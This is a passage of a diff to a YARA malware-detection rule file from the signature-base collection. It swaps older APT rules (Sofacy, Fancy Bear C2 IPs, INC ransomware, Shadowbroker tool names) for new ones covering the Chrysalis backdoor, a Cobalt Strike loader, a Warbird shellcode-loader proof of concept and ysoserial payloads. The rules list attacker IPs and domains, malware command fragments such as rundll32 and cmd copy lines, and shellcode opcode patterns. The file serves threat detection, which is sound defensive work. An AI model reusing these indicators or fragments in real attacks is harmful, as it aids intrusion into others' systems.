+		description = "Detects shellcode used to load Chrysalis backdoor, seen being used in the compromise of the infrastructure hosting Notepad++ by Chinese APT group Lotus Blossom"
+		author = "X__Junior"
+		id = "0d0feee2-f0af-5b7d-95a2-7108448fb0e5"
+		date = "2026-02-02"
+		modified = "2026-02-04"
+		reference = "https://www.rapid7.com/blog/post/tr-chrysalis-backdoor-dive-into-lotus-blossoms-toolkit/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/lotusblossom_notepad_exploitation.yar#L16-L29"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "5f6b2a0d1d966fc4f1ed292b46240767f4acb06c13512b0061b434ae2a692fa1"
-		logic_hash = "80c433cf5b3d042e46b5441a1b027c5ecf571f30571064904a33e92677633e66"
-		score = 70
+		hash = "e2e3d78437cf9d48c2b2264e44bb36bc2235834fc45bbb50b5d6867f336711e3"
+		logic_hash = "1baf027548cc1f501e2f99d4a337eaafec1e8ac2c48420cbff25c396083b6273"
+		score = 80
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$s1 = "shell\\open\\command=\"System Volume Information\\USBGuard.exe\" install" fullword ascii
-		$s2 = ".?AVAgentModuleRemoteKeyLogger@@" fullword ascii
-		$s3 = "<font size=4 color=red>process isn't exist</font>" fullword ascii
-		$s4 = "<font size=4 color=red>process is exist</font>" fullword ascii
-		$s5 = ".winnt.check-fix.com" ascii
-		$s6 = ".update.adobeincorp.com" ascii
-		$s7 = ".microsoft.checkwinframe.com" ascii
-		$s8 = "adobeincorp.com" fullword wide
-		$s9 = "# EXC: HttpSender - Cannot create Get Channel!" fullword ascii
-		$x1 = "User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:20.0) Gecko/20100101 Firefox/" wide
-		$x2 = "User-Agent: Mozilla/5.0 (Windows NT 6.; WOW64; rv:20.0) Gecko/20100101 Firefox/2" wide
-		$x3 = "C:\\Windows\\System32\\cmd.exe" fullword wide
+		$op1 = { 8B C7 03 D7 83 E0 ?? 47 8A 4C 05 ?? 8A 04 13 02 C1 32 C1 2A C1 88 02 8B 55 ?? 3B FE 7C ?? 8B 5D ?? 8B 45 }
+		$op2 = { 03 F8 8B 45 ?? 8B 50 ?? 85 C9 79 ?? 0F B7 C1 EB ?? 8D 41 ?? 03 C3 50 FF 75 ?? FF D2 89 07 85 C0 74 ?? 8B 4D ?? 46 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and ( 2 of ( $s* ) or ( 1 of ( $s* ) and all of ( $x* ) ) )
+		1 of them
 }
-rule SIGNATURE_BASE_Sofacy_Bundestag_Batch : FILE
+rule SIGNATURE_BASE_MAL_Chrysalis_Backdoor_Feb26
 {
 	meta:
-		description = "Sofacy Bundestags APT Batch Script"
-		author = "Florian Roth (Nextron Systems)"
-		id = "869dafec-1387-5640-b608-b84cf0d43342"
-		date = "2015-06-19"
-		modified = "2023-12-05"
-		reference = "http://dokumente.linksfraktion.de/inhalt/report-orig.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sofacy_xtunnel_bundestag.yar#L101-L116"
+		description = "Detects Chrysalis backdoor, seen being used in the compromise of the infrastructure hosting Notepad++ by Chinese APT group Lotus Blossom"
+		author = "X__Junior"
+		id = "e555ff63-63ac-572a-8b3b-8b7d40bf92aa"
+		date = "2026-02-02"
+		modified = "2026-02-04"
+		reference = "https://www.rapid7.com/blog/post/tr-chrysalis-backdoor-dive-into-lotus-blossoms-toolkit/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/lotusblossom_notepad_exploitation.yar#L31-L48"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "05d6df161042a65f9eeec4be4046001a03fa61747a9ea123f13e6e75d6664ac7"
-		score = 70
+		hash = "e2e3d78437cf9d48c2b2264e44bb36bc2235834fc45bbb50b5d6867f336711e3"
+		logic_hash = "9df8794d9927b92f0810321901aa7836f6a404d48c121818f24473e92875ecc4"
+		score = 80
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$s1 = "for %%G in (.pdf, .xls, .xlsx, .doc, .docx)" ascii
-		$s2 = "cmd /c copy"
-		$s3 = "forfiles"
+		$opa1 = { 8B 4D ?? C1 CF ?? C1 C1 ?? 03 F9 D1 C3 8B 4D ?? C1 C1 ?? 03 F9 03 FB 8B 5D ?? 69 CF ?? ?? ?? ?? BF ?? ?? ?? ?? 2B F9 EB }
+		$opa2 = { F7 E9 [0-1] 8B C2 C1 E8 ?? 03 C2 8D 0C 40 8A C3 34 ?? [0-2] 0F B6 [1-4] 0F B6 C3 8B 5D [1-3] 0F 45 D0 }
+		$opb1 = { 0F B6 84 35 ?? ?? ?? ?? 88 84 3D ?? ?? ?? ?? 88 8C 35 ?? ?? ?? ?? 0F B6 84 3D ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 03 C2 0F B6 C0 0F B6 84 05 ?? ?? ?? ?? 30 04 19 43 3B 9D ?? ?? ?? ?? 7C }
 
 	condition:
-		filesize < 10KB and 2 of them
+		(1 of ( $opa* ) and $opb1 ) or all of ( $opa* )
 }
-rule SIGNATURE_BASE_COZY_FANCY_BEAR_Hunt : FILE
+rule SIGNATURE_BASE_MAL_Cobaltstrike_Beacon_Loader_Feb26 : FILE
 {
 	meta:
-		description = "Detects Cozy Bear / Fancy Bear C2 Server IPs"
-		author = "Florian Roth (Nextron Systems)"
-		id = "e81b4368-7383-5a48-a89a-f91b9306326e"
-		date = "2016-06-14"
-		modified = "2023-12-05"
-		reference = "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fancybear_dnc.yar#L10-L28"
+		description = "Detects Cobalt Strike beacon loader"
+		author = "X__Junior"
+		id = "1080e9f0-8830-5f8f-b249-65804be3c788"
+		date = "2026-02-02"
+		modified = "2026-02-04"
+		reference = "https://www.rapid7.com/blog/post/tr-chrysalis-backdoor-dive-into-lotus-blossoms-toolkit/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/lotusblossom_notepad_exploitation.yar#L50-L69"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "9009f181eeecce0ae322ba24335426399cf4484dfc9b7ea6905fb163b4bf0a25"
-		score = 75
+		hash = "0a9b8df968df41920b6ff07785cbfebe8bda29e6b512c94a3b2a83d10014d2fd"
+		hash = "b4169a831292e245ebdffedd5820584d73b129411546e7d3eccf4663d5fc5be3"
+		logic_hash = "949e70b1fb7f270a05d1626a12595ecab22bdec37a07e83c5cf64399506302a5"
+		score = 80
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "185.100.84.134" ascii wide fullword
-		$s2 = "58.49.58.58" ascii wide fullword
-		$s3 = "218.1.98.203" ascii wide fullword
-		$s4 = "187.33.33.8" ascii wide fullword
-		$s5 = "185.86.148.227" ascii wide fullword
-		$s6 = "45.32.129.185" ascii wide fullword
-		$s7 = "23.227.196.217" ascii wide fullword
+		$opa1 = { 45 33 C9 41 B8 ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 66 89 44 24 ?? 41 B8 ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ?? 0F B7 4C 24 ?? FF 15 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? FF 15 }
+		$opa2 = { 4C 8D 4C 24 ?? 41 B8 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 48 89 4C 24 ?? 4C 8D 0D ?? ?? ?? ?? 45 33 C0 33 D2 48 8B C8 FF 15 }
+		$opb1 = { 48 8D 89 ?? ?? ?? ?? 0F 10 00 0F 10 48 ?? 48 8D 80 ?? ?? ?? ?? 0F 11 41 ?? 0F 10 40 ?? 0F 11 49 ?? 0F 10 48 ?? 0F 11 41 ?? 0F 10 40 ?? 0F 11 49 ?? 0F 10 48 ?? 0F 11 41 ?? 0F 10 40 ?? 0F 11 49 ?? 0F 10 48 ?? 0F 11 41 ?? 0F 11 49 ?? 48 83 EA }
+		$opb2 = { 45 33 C9 48 89 84 24 ?? ?? ?? ?? 41 B8 18 00 00 00 C7 84 24 ?? ?? ?? ?? 03 00 00 00 48 8D 94 24 ?? ?? ?? ?? 48 89 BC 24 ?? ?? ?? ?? B9 B9 00 00 00 FF 15 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 1 of them
+		uint16( 0 ) == 0x5a4d and all of ( $opa* ) or all of ( $opb* )
 }
-rule SIGNATURE_BASE_COZY_FANCY_BEAR_Pagemgr_Hunt : FILE
+rule SIGNATURE_BASE_MAL_POC_Microsoft_Warbird_Loader_Feb26 : FILE
 {
 	meta:
-		description = "Detects a pagemgr.exe as mentioned in the CrowdStrike report"
-		author = "Florian Roth (Nextron Systems)"
-		id = "3c5c8843-81ba-510c-82ed-4b6e2286bdb2"
-		date = "2016-06-14"
-		modified = "2023-12-05"
-		reference = "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fancybear_dnc.yar#L30-L42"
+		description = "Detects a POC to turn Microsoft Warbird into a shellcode loader"
+		author = "X__Junior"
+		id = "52130f51-2058-51f7-87ce-570dc4c2f00c"
+		date = "2026-02-03"
+		modified = "2026-02-04"
+		reference = "https://cirosec.de/en/news/abusing-microsoft-warbird-for-shellcode-execution/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/lotusblossom_notepad_exploitation.yar#L71-L83"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c6055b7cd04b994c80395276e83bec664b7dd32f8093411bfde0850cca39e9f7"
+		hash = "29d0467ee452752286318f350ceb28a2b04ee4c6de550ba0edc34ae0fa7cbb03"
+		logic_hash = "daeae01f0d5103974ed011322db3b6a833ee0f67b8739a4e63d6b18704ffa605"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "pagemgr.exe" wide fullword
+		$op = { fe af fe ca ef be ad de }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 1 of them
+		uint16( 0 ) == 0x5a4d and $op
 }
-rule SIGNATURE_BASE_MAL_RANSOM_INC_Aug24 : FILE
+rule SIGNATURE_BASE_Ysoserial_Payload_Mozillarhino1 : FILE
 {
 	meta:
-		description = "Detects INC ransomware and it's variants like Lynx"
-		author = "X__Junior"
-		id = "b776490b-f26a-55d9-bb26-ec3c617f070c"
-		date = "2024-08-08"
-		modified = "2024-12-12"
-		reference = "https://twitter.com/rivitna2/status/1701739812733014313"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_inc_ransomware.yar#L1-L30"
+		description = "Ysoserial Payloads - file MozillaRhino1.bin"
+		author = "Florian Roth (Nextron Systems)"
+		id = "c269e032-b6ce-5faa-b3ce-a5304f3e9dab"
+		date = "2017-02-04"
+		modified = "2023-12-05"
+		reference = "https://github.com/frohoff/ysoserial"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_ysoserial_payloads.yar#L10-L23"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "335b92027c551d074015b830d137cf2fdee81d792cd7360f2499c83cc895fbbb"
-		score = 80
+		logic_hash = "ca8cdd2781812ed373ca558b3a5a2fac5d236e16e6dbb8d66caa45081aef968b"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "eaa0e773eb593b0046452f420b6db8a47178c09e6db0fa68f6a2d42c3f48e3bc"
-		hash2 = "1754c9973bac8260412e5ec34bf5156f5bb157aa797f95ff4fc905439b74357a"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "0143fee12fea5118be6dcbb862d8ba639790b7505eac00a9f1028481f874baa8"
 
 	strings:
-		$s1 = "tarting full encryption in" wide
-		$s2 = "oad hidden drives" wide
-		$s3 = "ending note to printers" ascii
-		$s4 = "uccessfully delete shadow copies from %c:/" wide
-		$op1 = { 33 C9 03 C6 83 C0 02 0F 92 C1 F7 D9 0B C8 51 E8 }
-		$op2 = { 8B 44 24 [1-4] 6A 00 50 FF 35 ?? ?? ?? ?? 50 FF 15}
-		$op3 = { 57 50 8D 45 ?? C7 45 ?? 00 00 00 00 50 6A 00 6A 00 6A 02 6A 00 6A 02 C7 45 ?? 00 00 00 00 FF D6 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 04 8B F8 8D 45 ?? 50 8D 45 ?? 50 FF 75 ?? 57 6A 02 6A 00 6A 02 FF D6 }
-		$op4 = { 6A FF 8D 4? ?? 5? 8D 4? ?? 5? 8D 4? ?? 5? 5? FF 15 ?? ?? ?? ?? 85 C0 }
-		$op5 = { 56 6A 00 68 01 00 10 00 FF 15 ?? ?? ?? ?? 8B F0 83 FE FF 74 ?? 6A 00 56 FF 15 ?? ?? ?? ?? 68 88 13 00 00 56 FF 15 ?? ?? ?? ?? 56 FF 15}
+		$s3 = "ysoserial.payloads" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( 3 of ( $s* ) or 3 of ( $op* ) or ( 2 of ( $s* ) and 2 of ( $op* ) ) )
+		( uint16( 0 ) == 0xedac and filesize < 40KB and all of them )
 }
-
-rule SIGNATURE_BASE_Sofacy_Oct17_1 : FILE
+rule SIGNATURE_BASE_Ysoserial_Payload_C3P0 : FILE
 {
 	meta:
-		description = "Detects Sofacy malware reported in October 2017"
+		description = "Ysoserial Payloads - file C3P0.bin"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6896dcf3-e422-5a40-bc1e-d1f35ae95c14"
-		date = "2017-10-23"
+		id = "c269e032-b6ce-5faa-b3ce-a5304f3e9dab"
+		date = "2017-02-04"
 		modified = "2023-12-05"
-		reference = "http://blog.talosintelligence.com/2017/10/cyber-conflict-decoy-document.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sofacy_oct17_camp.yar#L13-L47"
+		reference = "https://github.com/frohoff/ysoserial"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_ysoserial_payloads.yar#L25-L38"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c3620d0b347e6cc54af9e046f6b3b6515bfa23dd11225ce2720e09838708a42e"
+		logic_hash = "53188caff69e1dbf655f4df7cda1406dd357af14a92ca4e686f514299b0adafc"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "522fd9b35323af55113455d823571f71332e53dde988c2eb41395cf6b0c15805"
+		hash1 = "9932108d65e26d309bf7d97d389bc683e52e91eb68d0b1c8adfe318a4ec6e58b"
 
 	strings:
-		$x1 = "%localappdata%\\netwf.dll" fullword wide
-		$x2 = "set path = \"%localappdata%\\netwf.dll\"" fullword ascii
-		$x3 = "%localappdata%\\netwf.bat" fullword wide
-		$x4 = "KlpSvc.dll" fullword ascii
-		$g1 = "set path = \"%localappdata%\\" ascii
-		$g2 = "%localappdata%\\" wide
-		$s1 = "start rundll32.exe %path %,#1a" fullword ascii
-		$s2 = "gshell32" fullword wide
-		$s3 = "s - %lu" fullword ascii
-		$s4 = "be run i" fullword ascii
-		$s5 = "ingToBinhary" fullword ascii
-		$s6 = "%j%Xjs" fullword ascii
-		$s7 = "if NOT exist %path % (exit)" fullword ascii
+		$x1 = "exploitppppw" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and ( pe.imphash ( ) == "a2d1be6502b4b3c28959a4fb0196ea45" or pe.exports ( "KlpSvc" ) or ( 1 of ( $x* ) or 4 of them ) or ( $s1 and all of ( $g* ) ) )
+		( uint16( 0 ) == 0xedac and filesize < 3KB and all of them )
 }
-
-rule SIGNATURE_BASE_Sofacy_Oct17_2 : FILE
+rule SIGNATURE_BASE_Ysoserial_Payload_Spring1
 {
 	meta:
-		description = "Detects Sofacy malware reported in October 2017"
+		description = "Ysoserial Payloads - file Spring1.bin"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c820eab0-9b64-5718-8681-a4f515ee462b"
-		date = "2017-10-23"
+		id = "c269e032-b6ce-5faa-b3ce-a5304f3e9dab"
+		date = "2017-02-04"
 		modified = "2023-12-05"
-		reference = "http://blog.talosintelligence.com/2017/10/cyber-conflict-decoy-document.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sofacy_oct17_camp.yar#L49-L71"
+		reference = "https://github.com/frohoff/ysoserial"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_ysoserial_payloads.yar#L40-L59"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c2736cf9efbb022590f4c23986531e645ac412a5b98a950b143f2d75a33e8063"
+		logic_hash = "852390d242c5cac243b54c31234c0ef3e25cede376eea23c73f03d79c548be8a"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "ef027405492bc0719437eb58c3d2774cc87845f30c40040bbebbcc09a4e3dd18"
+		hash1 = "bf9b5f35bc1556d277853b71da24faf23cf9964d77245018a0fdf3359f3b1703"
+		hash2 = "9c0be107d93096066e82a5404eb6829b1daa6aaa1a7b43bcda3ddac567ce715a"
+		hash3 = "8cfa85c16d37fb2c38f277f39cafb6f0c0bd7ee62b14d53ad1dd9cb3f4b25dd8"
+		hash4 = "5c44482350f1c6d68749c8dec167660ca6427999c37bfebaa54f677345cdf63c"
+		hash5 = "95f966f2e8c5d0bcdfb34e603e3c0b911fa31fc960308e41fcd4459e4e07b4d1"
+		hash6 = "1da04d838141c64711d87695a4cdb4eedfd4a206cc80922a41cfc82df8e24187"
+		hash7 = "adf895fa95526c9ce48ec33297156dd69c3dbcdd2432000e61b2dd34ffc167c7"
 
 	strings:
-		$x1 = "netwf.dll" fullword wide
-		$s1 = "%s - %s - %2.2x" fullword wide
-		$s2 = "%s - %lu" fullword ascii
-		$s3 = "%s \"%s\", %s" fullword wide
-		$s4 = "%j%Xjsf" fullword ascii
+		$x1 = "ysoserial/Pwner" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 90KB and ( pe.imphash ( ) == "13344e2a717849489bcd93692f9646f7" or ( 4 of them ) ) ) or ( all of them )
+		1 of them
 }
-rule SIGNATURE_BASE_MAL_RTF_Embedded_OLE_PE : FILE
+rule SIGNATURE_BASE_Ysoserial_Payload : FILE
 {
 	meta:
-		description = "Detects a suspicious string often used in PE files in a hex encoded object stream"
+		description = "Ysoserial Payloads"
 		author = "Florian Roth (Nextron Systems)"
-		id = "20044f08-9574-5baf-b91e-47613e490d62"
-		date = "2018-01-22"
-		modified = "2023-11-25"
-		reference = "https://www.nextron-systems.com/2018/01/22/creating-yara-rules-detect-embedded-exe-files-ole-objects/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_susp_strings_in_ole.yar#L2-L27"
+		id = "c269e032-b6ce-5faa-b3ce-a5304f3e9dab"
+		date = "2017-02-04"
+		modified = "2023-12-05"
+		reference = "https://github.com/frohoff/ysoserial"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_ysoserial_payloads.yar#L61-L90"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "054abb34ae84e02469d726809a6d8aa582ebad65dd8385de7800d3f5db7ee31c"
-		score = 65
+		logic_hash = "eec48af8bd3b377c8dd5af71027f67b36e1bd4d4ccfbd8134a26783517b5585a"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "9c0be107d93096066e82a5404eb6829b1daa6aaa1a7b43bcda3ddac567ce715a"
+		hash2 = "adf895fa95526c9ce48ec33297156dd69c3dbcdd2432000e61b2dd34ffc167c7"
+		hash3 = "1da04d838141c64711d87695a4cdb4eedfd4a206cc80922a41cfc82df8e24187"
+		hash4 = "5c44482350f1c6d68749c8dec167660ca6427999c37bfebaa54f677345cdf63c"
+		hash5 = "747ba6c6d88470e4d7c36107dfdff235f0ed492046c7ec8a8720d169f6d271f4"
+		hash6 = "f0d2f1095da0164c03a0e801bd50f2f06793fb77938e53b14b57fd690d036929"
+		hash7 = "5466d47363e11cd1852807b57d26a828728b9d5a0389214181b966bd0d8d7e56"
+		hash8 = "95f966f2e8c5d0bcdfb34e603e3c0b911fa31fc960308e41fcd4459e4e07b4d1"
+		hash9 = "1fea8b54bb92249203d68d5564a01599b42b46fc3a828fe0423616ee2a2f2d99"
+		hash10 = "0143fee12fea5118be6dcbb862d8ba639790b7505eac00a9f1028481f874baa8"
+		hash11 = "8cfa85c16d37fb2c38f277f39cafb6f0c0bd7ee62b14d53ad1dd9cb3f4b25dd8"
+		hash12 = "bf9b5f35bc1556d277853b71da24faf23cf9964d77245018a0fdf3359f3b1703"
+		hash13 = "f756c88763d48cb8d99e26b4773eb03814d0bd9bd467cc743ebb1479b2c4073e"
 
 	strings:
-		$a1 = "546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f6465" ascii
-		$a2 = "4b45524e454c33322e646c6c" ascii
-		$a3 = "433a5c66616b65706174685c" ascii
-		$m3 = "4d5a40000100000006000000ffff"
-		$m2 = "4d5a50000200000004000f00ffff"
-		$m1 = "4d5a90000300000004000000ffff"
+		$x1 = "ysoserial/payloads/" ascii
+		$s1 = "StubTransletPayload" fullword ascii
+		$s2 = "Pwnrpw" fullword ascii
 
 	condition:
-		uint32be( 0 ) == 0x7B5C7274 and 1 of them
+		( uint16( 0 ) == 0xedac and filesize < 40KB and $x1 ) or ( all of them )
 }
-rule SIGNATURE_BASE_FVEY_Shadowbroker_Auct_Dez16_Strings : FILE
+rule SIGNATURE_BASE_Ysoserial_Payload_3 : FILE
 {
 	meta:
-		description = "String from the ShodowBroker Files Screenshots - Dec 2016"
+		description = "Ysoserial Payloads - from files JavassistWeld1.bin, JBossInterceptors.bin"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b1454c5d-01bc-599b-815c-aa1a3c52be3f"
-		date = "2016-12-17"
+		id = "7fb67f48-66dc-57a4-9075-49b2277fa186"
+		date = "2017-02-04"
 		modified = "2023-12-05"
-		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fvey_shadowbroker_dec16.yar#L11-L71"
+		reference = "https://github.com/frohoff/ysoserial"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_ysoserial_payloads.yar#L92-L113"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "3c632d90c5b26b840b267647faf453f85496b78c900910ad22896698c553c949"
-		score = 60
-		quality = 60
+		logic_hash = "49491d1c15af8c271fbbb7dedc678a91df74dcb093abe3f056b1ffc2fced99fe"
+		score = 75
+		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "f0d2f1095da0164c03a0e801bd50f2f06793fb77938e53b14b57fd690d036929"
+		hash2 = "5466d47363e11cd1852807b57d26a828728b9d5a0389214181b966bd0d8d7e56"
 
 	strings:
-		$s1 = "bs.ratload" fullword ascii
-		$s2 = "Auditcleaner" fullword ascii
-		$s3 = "bll.perlbind" fullword ascii
-		$s4 = "bll.perlcallback" fullword ascii
-		$s5 = "bll.telnet" fullword ascii
-		$s6 = "bll.tnc.gr" fullword ascii
-		$s7 = "clean_wtmps.py" fullword ascii
-		$s8 = "cmsex.auto" fullword ascii
-		$s9 = "cottonaxe" fullword ascii
-		$s10 = "dectelnet.sh" fullword ascii
-		$s11 = "elatedmonkey" fullword ascii
-		$s12 = "electricslide.pl" fullword ascii
-		$s13 = "endlessdonut" fullword ascii
-		$s14 = "solaris8shellcode" fullword ascii
-		$s15 = "solaris9shellcode" fullword ascii
-		$s16 = "solaris10shellcode" fullword ascii
-		$s17 = "ys.ratload.sh" fullword ascii
-		$elf1 = "catflap" fullword ascii
-		$elf2 = "charm_penguin" fullword ascii
-		$elf3 = "charm_hammer" fullword ascii
-		$elf4 = "charm_saver" fullword ascii
-		$elf5 = "dampcrowd" fullword ascii
-		$elf7 = "dubmoat" fullword ascii
-		$elf8 = "ebbshave" fullword ascii
-		$elf9 = "eggbasket" fullword ascii
-		$elf10 = "toffeehammer" fullword ascii
-		$elf11 = "enemyrun" fullword ascii
-		$elf12 = "envoytomato" fullword ascii
-		$elf13 = "expoxyresin" fullword ascii
-		$elf14 = "estopmoonlit" fullword ascii
-		$elf15 = "linux-exactchange" fullword ascii
-		$elf17 = "ghost_sparc" fullword ascii
-		$elf18 = "jackpop" fullword ascii
-		$elf19 = "orleans_stride" fullword ascii
-		$elf20 = "prokserver" fullword ascii
-		$elf21 = "seconddate" fullword ascii
-		$elf22 = "shentysdelight" fullword ascii
-		$elf23 = "skimcountry" fullword ascii
-		$elf24 = "slyheretic" fullword ascii
-		$elf25 = "stoicsurgeon" fullword ascii
-		$elf26 = "strifeworld" fullword ascii
-		$elf27 = "suaveeyeful" fullword ascii
-		$elf28 = "suctionchar" fullword ascii
-		$elf29 = "vs.attack.linux" fullword ascii
-		$pe1 = "charm_razor" fullword ascii wide
-		$pe2 = "charm_saver" fullword ascii wide
-		$pe3 = "ghost_x86" fullword ascii wide
+		$x1 = "ysoserialq" fullword ascii
+		$s1 = "targetClassInterceptorMetadatat" fullword ascii
+		$s2 = "targetInstancet" fullword ascii
+		$s3 = "targetClassL" fullword ascii
+		$s4 = "POST_ACTIVATEsr" fullword ascii
+		$s5 = "PRE_DESTROYsq" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x457f and 1 of ( $elf* ) ) or ( uint16( 0 ) == 0x5a4d and 1 of ( $pe* ) ) or 1 of ( $s* )
+		( uint16( 0 ) == 0xedac and filesize < 10KB and $x1 ) or ( all of them )
 }
-rule SIGNATURE_BASE_FVEY_Shadowbroker_Violetspirit
+rule SIGNATURE_BASE_APT_APT29_NOBELIUM_JS_Envyscout_May21_1 : FILE
 {
 	meta:
-		description = "Auto-generated rule - file violetspirit.README"
+		description = "Detects EnvyScout deobfuscator code as used by NOBELIUM group"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4efea734-8cbc-53f7-bf92-5b3253721a81"
-		date = "2016-12-17"
-		modified = "2023-12-05"
-		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fvey_shadowbroker_dec16.yar#L73-L86"
+		id = "42739aad-a88a-545b-8256-1f727c79c4f8"
+		date = "2021-05-29"
+		modified = "2025-03-21"
+		reference = "https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt29_nobelium_may21.yar#L56-L67"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "01a45feb5c9f9cfe8834306993c53b1e53d79b89b07106ffec0c81cdebb8b71c"
+		logic_hash = "ad8a7bb5a1d2065e3a573842fb37ee3c63b7695c18840f0c26d32e6ae3d99c6c"
 		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
